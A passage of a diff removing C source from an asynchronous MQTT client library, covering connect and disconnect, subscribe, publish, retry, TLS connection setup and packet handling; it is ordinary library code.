-	if ((found = ListFindItem(handles, client, clientStructCompare)) != NULL)
-	{
-		MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-		MQTTAsync_removeResponsesAndCommands(m);
-	}
-	else
-		Log(LOG_ERROR, -1, "cleanSession: did not find client structure in handles list");
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_deliverMessage(MQTTAsyncs* m, char* topicName, size_t topicLen, MQTTAsync_message* mm)
-{
-	int rc;
-
-	Log(TRACE_MIN, -1, "Calling messageArrived for client %s, queue depth %d",
-					m->c->clientID, m->c->messageQueue->count);
-	rc = (*(m->ma))(m->context, topicName, (int)topicLen, mm);
-	/* if 0 (false) is returned by the callback then it failed, so we don't remove the message from
-	 * the queue, and it will be retried later.  If 1 is returned then the message data may have been freed,
-	 * so we must be careful how we use it.
-	 */
-	return rc;
-}
-
-
-void Protocol_processPublication(Publish* publish, Clients* client)
-{
-	MQTTAsync_message* mm = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	mm = malloc(sizeof(MQTTAsync_message));
-
-	/* If the message is QoS 2, then we have already stored the incoming payload
-	 * in an allocated buffer, so we don't need to copy again.
-	 */
-	if (publish->header.bits.qos == 2)
-		mm->payload = publish->payload;
-	else
-	{
-		mm->payload = malloc(publish->payloadlen);
-		memcpy(mm->payload, publish->payload, publish->payloadlen);
-	}
-
-	mm->payloadlen = publish->payloadlen;
-	mm->qos = publish->header.bits.qos;
-	mm->retained = publish->header.bits.retain;
-	if (publish->header.bits.qos == 2)
-		mm->dup = 0;  /* ensure that a QoS2 message is not passed to the application with dup = 1 */
-	else
-		mm->dup = publish->header.bits.dup;
-	mm->msgid = publish->msgId;
-
-	if (client->messageQueue->count == 0 && client->connected)
-	{
-		ListElement* found = NULL;
-
-		if ((found = ListFindItem(handles, client, clientStructCompare)) == NULL)
-			Log(LOG_ERROR, -1, "processPublication: did not find client structure in handles list");
-		else
-		{
-			MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-
-			if (m->ma)
-				rc = MQTTAsync_deliverMessage(m, publish->topic, publish->topiclen, mm);
-		}
-	}
-
-	if (rc == 0) /* if message was not delivered, queue it up */
-	{
-		qEntry* qe = malloc(sizeof(qEntry));
-		qe->msg = mm;
-		qe->topicName = publish->topic;
-		qe->topicLen = publish->topiclen;
-		ListAppend(client->messageQueue, qe, sizeof(qe) + sizeof(mm) + mm->payloadlen + strlen(qe->topicName)+1);
-#if !defined(NO_PERSISTENCE)
-		if (client->persistence)
-			MQTTPersistence_persistQueueEntry(client, (MQTTPersistence_qEntry*)qe);
-#endif
-	}
-	publish->topic = NULL;
-	FUNC_EXIT;
-}
-
-
-static int retryLoopInterval = 5;
-
-static void setRetryLoopInterval(int keepalive)
-{
-	int proposed = keepalive / 10;
-
-	if (proposed < 1)
-		proposed = 1;
-	else if (proposed > 5)
-		proposed = 5;
-	if (proposed < retryLoopInterval)
-		retryLoopInterval = proposed;
-}
-
-
-int MQTTAsync_connect(MQTTAsync handle, const MQTTAsync_connectOptions* options)
-{
-	MQTTAsyncs* m = handle;
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsync_queuedCommand* conn;
-
-	FUNC_ENTRY;
-	if (options == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(options->struct_id, "MQTC", 4) != 0 || options->struct_version < 0 || options->struct_version > 5)
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-	if (options->will) /* check validity of will options structure */
-	{
-		if (strncmp(options->will->struct_id, "MQTW", 4) != 0 || (options->will->struct_version != 0 && options->will->struct_version != 1))
-		{
-			rc = MQTTASYNC_BAD_STRUCTURE;
-			goto exit;
-		}
-		if (options->will->qos < 0 || options->will->qos > 2)
-		{
-			rc = MQTTASYNC_BAD_QOS;
-			goto exit;
-		}
-	}
-	if (options->struct_version != 0 && options->ssl) /* check validity of SSL options structure */
-	{
-		if (strncmp(options->ssl->struct_id, "MQTS", 4) != 0 || options->ssl->struct_version < 0 || options->ssl->struct_version > 1)
-		{
-			rc = MQTTASYNC_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-	if ((options->username && !UTF8_validateString(options->username)) ||
-		(options->password && !UTF8_validateString(options->password)))
-	{
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	m->connect.onSuccess = options->onSuccess;
-	m->connect.onFailure = options->onFailure;
-	m->connect.context = options->context;
-	m->connectTimeout = options->connectTimeout;
-
-	tostop = 0;
-	if (sendThread_state != STARTING && sendThread_state != RUNNING)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		sendThread_state = STARTING;
-		Thread_start(MQTTAsync_sendThread, NULL);
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	}
-	if (receiveThread_state != STARTING && receiveThread_state != RUNNING)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		receiveThread_state = STARTING;
-		Thread_start(MQTTAsync_receiveThread, handle);
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	}
-
-	m->c->keepAliveInterval = options->keepAliveInterval;
-	setRetryLoopInterval(options->keepAliveInterval);
-	m->c->cleansession = options->cleansession;
-	m->c->maxInflightMessages = options->maxInflight;
-	if (options->struct_version >= 3)
-		m->c->MQTTVersion = options->MQTTVersion;
-	else
-		m->c->MQTTVersion = 0;
-	if (options->struct_version >= 4)
-	{
-		m->automaticReconnect = options->automaticReconnect;
-		m->minRetryInterval = options->minRetryInterval;
-		m->maxRetryInterval = options->maxRetryInterval;
-	}
-
-	if (m->c->will)
-	{
-		free(m->c->will->payload);
-		free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-
-	if (options->will && (options->will->struct_version == 0 || options->will->struct_version == 1))
-	{
-		const void* source = NULL;
-
-		m->c->will = malloc(sizeof(willMessages));
-		if (options->will->message || (options->will->struct_version == 1 && options->will->payload.data))
-		{
-			if (options->will->struct_version == 1 && options->will->payload.data)
-			{
-				m->c->will->payloadlen = options->will->payload.len;
-				source = options->will->payload.data;
-			}
-			else
-			{
-				m->c->will->payloadlen = strlen(options->will->message);
-				source = (void*)options->will->message;
-			}
-			m->c->will->payload = malloc(m->c->will->payloadlen);
-			memcpy(m->c->will->payload, source, m->c->will->payloadlen);
-		}
-		else
-		{
-			m->c->will->payload = NULL;
-			m->c->will->payloadlen = 0;
-		}
-		m->c->will->qos = options->will->qos;
-		m->c->will->retained = options->will->retained;
-		m->c->will->topic = MQTTStrdup(options->will->topicName);
-	}
-
-#if defined(OPENSSL)
-	if (m->c->sslopts)
-	{
-		if (m->c->sslopts->trustStore)
-			free((void*)m->c->sslopts->trustStore);
-		if (m->c->sslopts->keyStore)
-			free((void*)m->c->sslopts->keyStore);
-		if (m->c->sslopts->privateKey)
-			free((void*)m->c->sslopts->privateKey);
-		if (m->c->sslopts->privateKeyPassword)
-			free((void*)m->c->sslopts->privateKeyPassword);
-		if (m->c->sslopts->enabledCipherSuites)
-			free((void*)m->c->sslopts->enabledCipherSuites);
-		free((void*)m->c->sslopts);
-		m->c->sslopts = NULL;
-	}
-
-	if (options->struct_version != 0 && options->ssl)
-	{
-		m->c->sslopts = malloc(sizeof(MQTTClient_SSLOptions));
-		memset(m->c->sslopts, '\0', sizeof(MQTTClient_SSLOptions));
-		m->c->sslopts->struct_version = options->ssl->struct_version;
-		if (options->ssl->trustStore)
-			m->c->sslopts->trustStore = MQTTStrdup(options->ssl->trustStore);
-		if (options->ssl->keyStore)
-			m->c->sslopts->keyStore = MQTTStrdup(options->ssl->keyStore);
-		if (options->ssl->privateKey)
-			m->c->sslopts->privateKey = MQTTStrdup(options->ssl->privateKey);
-		if (options->ssl->privateKeyPassword)
-			m->c->sslopts->privateKeyPassword = MQTTStrdup(options->ssl->privateKeyPassword);
-		if (options->ssl->enabledCipherSuites)
-			m->c->sslopts->enabledCipherSuites = MQTTStrdup(options->ssl->enabledCipherSuites);
-		m->c->sslopts->enableServerCertAuth = options->ssl->enableServerCertAuth;
-		if (m->c->sslopts->struct_version >= 1)
-			m->c->sslopts->sslVersion = options->ssl->sslVersion;
-	}
-#else
-	if (options->struct_version != 0 && options->ssl)
-	{
-		rc = MQTTASYNC_SSL_NOT_SUPPORTED;
-		goto exit;
-	}
-#endif
-
-	m->c->username = options->username;
-	m->c->password = options->password;
-	if (options->password)
-		m->c->passwordlen = strlen(options->password);
-	else if (options->struct_version >= 5 && options->binarypwd.data)
-	{
-		m->c->password = options->binarypwd.data;
-		m->c->passwordlen = options->binarypwd.len;
-	}
-
-	m->c->retryInterval = options->retryInterval;
-	m->shouldBeConnected = 1;
-
-	m->connectTimeout = options->connectTimeout;
-
-	MQTTAsync_freeServerURIs(m);
-	if (options->struct_version >= 2 && options->serverURIcount > 0)
-	{
-		int i;
-
-		m->serverURIcount = options->serverURIcount;
-		m->serverURIs = malloc(options->serverURIcount * sizeof(char*));
-		for (i = 0; i < options->serverURIcount; ++i)
-			m->serverURIs[i] = MQTTStrdup(options->serverURIs[i]);
-	}
-
-	/* Add connect request to operation queue */
-	conn = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-	conn->client = m;
-	if (options)
-	{
-		conn->command.onSuccess = options->onSuccess;
-		conn->command.onFailure = options->onFailure;
-		conn->command.context = options->context;
-	}
-	conn->command.type = CONNECT;
-	conn->command.details.conn.currentURI = 0;
-	rc = MQTTAsync_addCommand(conn, sizeof(conn));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_disconnect1(MQTTAsync handle, const MQTTAsync_disconnectOptions* options, int internal)
-{
-	MQTTAsyncs* m = handle;
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsync_queuedCommand* dis;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (!internal)
-		m->shouldBeConnected = 0;
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-
-	/* Add disconnect request to operation queue */
-	dis = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(dis, '\0', sizeof(MQTTAsync_queuedCommand));
-	dis->client = m;
-	if (options)
-	{
-		dis->command.onSuccess = options->onSuccess;
-		dis->command.onFailure = options->onFailure;
-		dis->command.context = options->context;
-		dis->command.details.dis.timeout = options->timeout;
-	}
-	dis->command.type = DISCONNECT;
-	dis->command.details.dis.internal = internal;
-	rc = MQTTAsync_addCommand(dis, sizeof(dis));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_disconnect_internal(MQTTAsync handle, int timeout)
-{
-	MQTTAsync_disconnectOptions options = MQTTAsync_disconnectOptions_initializer;
-
-	options.timeout = timeout;
-	return MQTTAsync_disconnect1(handle, &options, 1);
-}
-
-
-void MQTTProtocol_closeSession(Clients* c, int sendwill)
-{
-	MQTTAsync_disconnect_internal((MQTTAsync)c->context, 0);
-}
-
-
-int MQTTAsync_disconnect(MQTTAsync handle, const MQTTAsync_disconnectOptions* options)
-{
-	return MQTTAsync_disconnect1(handle, options, 0);
-}
-
-
-int MQTTAsync_isConnected(MQTTAsync handle)
-{
-	MQTTAsyncs* m = handle;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	if (m && m->c)
-		rc = m->c->connected;
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int cmdMessageIDCompare(void* a, void* b)
-{
-	MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)a;
-	return cmd->command.token == *(int*)b;
-}
-
-
-/**
- * Assign a new message id for a client.  Make sure it isn't already being used and does
- * not exceed the maximum.
- * @param m a client structure
- * @return the next message id to use, or 0 if none available
- */
-static int MQTTAsync_assignMsgId(MQTTAsyncs* m)
-{
-	int start_msgid = m->c->msgID;
-	int msgid = start_msgid;
-	thread_id_type thread_id = 0;
-	int locked = 0;
-
-	/* need to check: commands list and response list for a client */
-	FUNC_ENTRY;
-	/* We might be called in a callback. In which case, this mutex will be already locked. */
-	thread_id = Thread_getid();
-	if (thread_id != sendThread_id && thread_id != receiveThread_id)
-	{
-		MQTTAsync_lock_mutex(mqttasync_mutex);
-		locked = 1;
-	}
-
-	msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-	while (ListFindItem(commands, &msgid, cmdMessageIDCompare) ||
-			ListFindItem(m->responses, &msgid, cmdMessageIDCompare))
-	{
-		msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-		if (msgid == start_msgid)
-		{ /* we've tried them all - none free */
-			msgid = 0;
-			break;
-		}
-	}
-	if (msgid != 0)
-		m->c->msgID = msgid;
-	if (locked)
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(msgid);
-	return msgid;
-}
-
-
-int MQTTAsync_subscribeMany(MQTTAsync handle, int count, char* const* topic, int* qos, MQTTAsync_responseOptions* response)
-{
-	MQTTAsyncs* m = handle;
-	int i = 0;
-	int rc = MQTTASYNC_FAILURE;
-	MQTTAsync_queuedCommand* sub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTASYNC_BAD_UTF8_STRING;
-			goto exit;
-		}
-		if (qos[i] < 0 || qos[i] > 2)
-		{
-			rc = MQTTASYNC_BAD_QOS;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTAsync_assignMsgId(m)) == 0)
-	{
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-		goto exit;
-	}
-
-	/* Add subscribe request to operation queue */
-	sub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(sub, '\0', sizeof(MQTTAsync_queuedCommand));
-	sub->client = m;
-	sub->command.token = msgid;
-	if (response)
-	{
-		sub->command.onSuccess = response->onSuccess;
-		sub->command.onFailure = response->onFailure;
-		sub->command.context = response->context;
-		response->token = sub->command.token;
-	}
-	sub->command.type = SUBSCRIBE;
-	sub->command.details.sub.count = count;
-	sub->command.details.sub.topics = malloc(sizeof(char*) * count);
-	sub->command.details.sub.qoss = malloc(sizeof(int) * count);
-	for (i = 0; i < count; ++i)
-	{
-		sub->command.details.sub.topics[i] = MQTTStrdup(topic[i]);
-		sub->command.details.sub.qoss[i] = qos[i];
-	}
-	rc = MQTTAsync_addCommand(sub, sizeof(sub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_subscribe(MQTTAsync handle, const char* topic, int qos, MQTTAsync_responseOptions* response)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTAsync_subscribeMany(handle, 1, topics, &qos, response);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_unsubscribeMany(MQTTAsync handle, int count, char* const* topic, MQTTAsync_responseOptions* response)
-{
-	MQTTAsyncs* m = handle;
-	int i = 0;
-	int rc = SOCKET_ERROR;
-	MQTTAsync_queuedCommand* unsub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTASYNC_BAD_UTF8_STRING;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTAsync_assignMsgId(m)) == 0)
-	{
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-		goto exit;
-	}
-
-	/* Add unsubscribe request to operation queue */
-	unsub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(unsub, '\0', sizeof(MQTTAsync_queuedCommand));
-	unsub->client = m;
-	unsub->command.type = UNSUBSCRIBE;
-	unsub->command.token = msgid;
-	if (response)
-	{
-		unsub->command.onSuccess = response->onSuccess;
-		unsub->command.onFailure = response->onFailure;
-		unsub->command.context = response->context;
-		response->token = unsub->command.token;
-	}
-	unsub->command.details.unsub.count = count;
-	unsub->command.details.unsub.topics = malloc(sizeof(char*) * count);
-	for (i = 0; i < count; ++i)
-		unsub->command.details.unsub.topics[i] = MQTTStrdup(topic[i]);
-	rc = MQTTAsync_addCommand(unsub, sizeof(unsub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_unsubscribe(MQTTAsync handle, const char* topic, MQTTAsync_responseOptions* response)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTAsync_unsubscribeMany(handle, 1, topics, response);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_countBufferedMessages(MQTTAsyncs* m)
-{
-	ListElement* current = NULL;
-	int count = 0;
-
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m && cmd->command.type == PUBLISH)
-			count++;
-	}
-	return count;
-}
-
-
-int MQTTAsync_send(MQTTAsync handle, const char* destinationName, int payloadlen, void* payload,
-							 int qos, int retained, MQTTAsync_responseOptions* response)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	MQTTAsync_queuedCommand* pub;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-		rc = MQTTASYNC_FAILURE;
-	else if (m->c->connected == 0 && (m->createOptions == NULL ||
-		m->createOptions->sendWhileDisconnected == 0 || m->shouldBeConnected == 0))
-		rc = MQTTASYNC_DISCONNECTED;
-	else if (!UTF8_validateString(destinationName))
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-	else if (qos < 0 || qos > 2)
-		rc = MQTTASYNC_BAD_QOS;
-	else if (qos > 0 && (msgid = MQTTAsync_assignMsgId(m)) == 0)
-		rc = MQTTASYNC_NO_MORE_MSGIDS;
-	else if (m->createOptions && (MQTTAsync_countBufferedMessages(m) >= m->createOptions->maxBufferedMessages))
-		rc = MQTTASYNC_MAX_BUFFERED_MESSAGES;
-
-	if (rc != MQTTASYNC_SUCCESS)
-		goto exit;
-
-	/* Add publish request to operation queue */
-	pub = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(pub, '\0', sizeof(MQTTAsync_queuedCommand));
-	pub->client = m;
-	pub->command.type = PUBLISH;
-	pub->command.token = msgid;
-	if (response)
-	{
-		pub->command.onSuccess = response->onSuccess;
-		pub->command.onFailure = response->onFailure;
-		pub->command.context = response->context;
-		response->token = pub->command.token;
-	}
-	pub->command.details.pub.destinationName = MQTTStrdup(destinationName);
-	pub->command.details.pub.payloadlen = payloadlen;
-	pub->command.details.pub.payload = malloc(payloadlen);
-	memcpy(pub->command.details.pub.payload, payload, payloadlen);
-	pub->command.details.pub.qos = qos;
-	pub->command.details.pub.retained = retained;
-	rc = MQTTAsync_addCommand(pub, sizeof(pub));
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-int MQTTAsync_sendMessage(MQTTAsync handle, const char* destinationName, const MQTTAsync_message* message,
-													 MQTTAsync_responseOptions* response)
-{
-	int rc = MQTTASYNC_SUCCESS;
-
-	FUNC_ENTRY;
-	if (message == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-	if (strncmp(message->struct_id, "MQTM", 4) != 0 || message->struct_version != 0)
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	rc = MQTTAsync_send(handle, destinationName, message->payloadlen, message->payload,
-								message->qos, message->retained, response);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_retry(void)
-{
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) > retryLoopInterval)
-	{
-		time(&(last));
-		MQTTProtocol_keepalive(now);
-		MQTTProtocol_retry(now, 1, 0);
-	}
-	else
-		MQTTProtocol_retry(now, 0, 0);
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_connecting(MQTTAsyncs* m)
-{
-	int rc = -1;
-
-	FUNC_ENTRY;
-	if (m->c->connect_state == 1) /* TCP connect started - check for completion */
-	{
-		int error;
-		socklen_t len = sizeof(error);
-
-		if ((rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-			rc = error;
-
-		if (rc != 0)
-			goto exit;
-
-		Socket_clearPendingWrite(m->c->net.socket);
-
-#if defined(OPENSSL)
-		if (m->ssl)
-		{
-			int port;
-			char* hostname;
-			int setSocketForSSLrc = 0;
-
-			hostname = MQTTProtocol_addressPort(m->serverURI, &port);
-			setSocketForSSLrc = SSLSocket_setSocketForSSL(&m->c->net, m->c->sslopts, hostname);
-			if (hostname != m->serverURI)
-				free(hostname);
-
-			if (setSocketForSSLrc != MQTTASYNC_SUCCESS)
-			{
-				if (m->c->session != NULL)
-					if ((rc = SSL_set_session(m->c->net.ssl, m->c->session)) != 1)
-						Log(TRACE_MIN, -1, "Failed to set SSL session with stored data, non critical");
-				rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-				{
-					rc = MQTTCLIENT_SUCCESS; /* the connect is still in progress */
-					m->c->connect_state = 2;
-				}
-				else if (rc == SSL_FATAL)
-				{
-					rc = SOCKET_ERROR;
-					goto exit;
-				}
-				else if (rc == 1)
-				{
-					rc = MQTTCLIENT_SUCCESS;
-					m->c->connect_state = 3;
-					if (MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion) == SOCKET_ERROR)
-					{
-						rc = SOCKET_ERROR;
-						goto exit;
-					}
-					if (!m->c->cleansession && m->c->session == NULL)
-						m->c->session = SSL_get1_session(m->c->net.ssl);
-				}
-			}
-			else
-			{
-				rc = SOCKET_ERROR;
-				goto exit;
-			}
-		}
-		else
-		{
-#endif
-			m->c->connect_state = 3; /* TCP/SSL connect completed, in which case send the MQTT connect packet */
-			if ((rc = MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion)) == SOCKET_ERROR)
-				goto exit;
-#if defined(OPENSSL)
-		}
-#endif
-	}
-#if defined(OPENSSL)
-	else if (m->c->connect_state == 2) /* SSL connect sent - wait for completion */
-	{
-		if ((rc = SSLSocket_connect(m->c->net.ssl, m->c->net.socket)) != 1)
-			goto exit;
-
-		if(!m->c->cleansession && m->c->session == NULL)
-			m->c->session = SSL_get1_session(m->c->net.ssl);
-		m->c->connect_state = 3; /* SSL connect completed, in which case send the MQTT connect packet */
-		if ((rc = MQTTPacket_send_connect(m->c, m->connect.details.conn.MQTTVersion)) == SOCKET_ERROR)
-			goto exit;
-	}
-#endif
-
-exit:
-	if ((rc != 0 && rc != TCPSOCKET_INTERRUPTED && m->c->connect_state != 2) || (rc == SSL_FATAL))
-		nextOrClose(m, MQTTASYNC_FAILURE, "TCP/TLS connect failure");
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTPacket* MQTTAsync_cycle(int* sock, unsigned long timeout, int* rc)
-{
-	struct timeval tp = {0L, 0L};
-	static Ack ack;
-	MQTTPacket* pack = NULL;
-
-	FUNC_ENTRY;
-	if (timeout > 0L)
-	{
-		tp.tv_sec = timeout / 1000;
-		tp.tv_usec = (timeout % 1000) * 1000; /* this field is microseconds! */
-	}
-
-#if defined(OPENSSL)
-	if ((*sock = SSLSocket_getPendingRead()) == -1)
-	{
-#endif
-		Thread_lock_mutex(socket_mutex);
-		/* 0 from getReadySocket indicates no work to do, -1 == error, but can happen normally */
-		*sock = Socket_getReadySocket(0, &tp);
-		Thread_unlock_mutex(socket_mutex);
-		if (!tostop && *sock == 0 && (tp.tv_sec > 0L || tp.tv_usec > 0L))
-			MQTTAsync_sleep(100L);
-#if defined(OPENSSL)
-	}
-#endif
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	if (*sock > 0)
-	{
-		MQTTAsyncs* m = NULL;
-		if (ListFindItem(handles, sock, clientSockCompare) != NULL)
-			m = (MQTTAsync)(handles->current->content);
-		if (m != NULL)
-		{
-			Log(TRACE_MINIMUM, -1, "m->c->connect_state = %d",m->c->connect_state);
-			if (m->c->connect_state == 1 || m->c->connect_state == 2)
-				*rc = MQTTAsync_connecting(m);
-			else
-				pack = MQTTPacket_Factory(&m->c->net, rc);
-			if (m->c->connect_state == 3 && *rc == SOCKET_ERROR)
-			{
-				Log(TRACE_MINIMUM, -1, "CONNECT sent but MQTTPacket_Factory has returned SOCKET_ERROR");
-				nextOrClose(m, MQTTASYNC_FAILURE, "TCP connect completion failure");
-			}
-			else
-			{
-				Log(TRACE_MINIMUM, -1, "m->c->connect_state = %d",m->c->connect_state);
-				Log(TRACE_MINIMUM, -1, "CONNECT sent, *rc is %d",*rc);
-			}
-		}
-		if (pack)
-		{
-			int freed = 1;
-
-			/* Note that these handle... functions free the packet structure that they are dealing with */
-			if (pack->header.bits.type == PUBLISH)
-				*rc = MQTTProtocol_handlePublishes(pack, *sock);
-			else if (pack->header.bits.type == PUBACK || pack->header.bits.type == PUBCOMP)
-			{
-				int msgid;
-
-				ack = (pack->header.bits.type == PUBCOMP) ? *(Pubcomp*)pack : *(Puback*)pack;
-				msgid = ack.msgId;
-				*rc = (pack->header.bits.type == PUBCOMP) ?
-						MQTTProtocol_handlePubcomps(pack, *sock) : MQTTProtocol_handlePubacks(pack, *sock);
-				if (!m)
-					Log(LOG_ERROR, -1, "PUBCOMP or PUBACK received for no client, msgid %d", msgid);
-				if (m)
-				{
-					ListElement* current = NULL;
-
-					if (m->dc)
-					{
-						Log(TRACE_MIN, -1, "Calling deliveryComplete for client %s, msgid %d", m->c->clientID, msgid);
-						(*(m->dc))(m->context, msgid);
-					}
-					/* use the msgid to find the callback to be called */
-					while (ListNextElement(m->responses, &current))
-					{
-						MQTTAsync_queuedCommand* command = (MQTTAsync_queuedCommand*)(current->content);
-						if (command->command.token == msgid)
-						{
-							if (!ListDetach(m->responses, command)) /* then remove the response from the list */
-								Log(LOG_ERROR, -1, "Publish command not removed from command list");
-							if (command->command.onSuccess)
-							{
-								MQTTAsync_successData data;
-
-								data.token = command->command.token;
-								data.alt.pub.destinationName = command->command.details.pub.destinationName;
-								data.alt.pub.message.payload = command->command.details.pub.payload;
-								data.alt.pub.message.payloadlen = command->command.details.pub.payloadlen;
-								data.alt.pub.message.qos = command->command.details.pub.qos;
-								data.alt.pub.message.retained = command->command.details.pub.retained;
-								Log(TRACE_MIN, -1, "Calling publish success for client %s", m->c->clientID);
-								(*(command->command.onSuccess))(command->command.context, &data);
-							}
-							MQTTAsync_freeCommand(command);
-							break;
-						}
-					}
-				}
-			}
-			else if (pack->header.bits.type == PUBREC)
-				*rc = MQTTProtocol_handlePubrecs(pack, *sock);
-			else if (pack->header.bits.type == PUBREL)
-				*rc = MQTTProtocol_handlePubrels(pack, *sock);
-			else if (pack->header.bits.type == PINGRESP)
-				*rc = MQTTProtocol_handlePingresps(pack, *sock);
-			else
-				freed = 0;
-			if (freed)
-				pack = NULL;
-		}
-	}
-	MQTTAsync_retry();
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-/*
-static int pubCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->publish == (Publications*)b;
-}*/
-
-
-int MQTTAsync_getPendingTokens(MQTTAsync handle, MQTTAsync_token **tokens)
-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	ListElement* current = NULL;
-	int count = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	*tokens = NULL;
-
-	if (m == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-
-	/* calculate the number of pending tokens - commands plus inflight */
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m)
-			count++;
-	}
-	if (m->c)
-		count += m->c->outboundMsgs->count;
-	if (count == 0)
-		goto exit; /* no tokens to return */
-	*tokens = malloc(sizeof(MQTTAsync_token) * (count + 1));  /* add space for sentinel at end of list */
-
-	/* First add the unprocessed commands to the pending tokens */
-	current = NULL;
-	count = 0;
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m)
-			(*tokens)[count++] = cmd->command.token;
-	}
-
-	/* Now add the inflight messages */
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		current = NULL;
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			(*tokens)[count++] = m->msgid;
-		}
-	}
-	(*tokens)[count] = -1; /* indicate end of list */
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_isComplete(MQTTAsync handle, MQTTAsync_token dt)
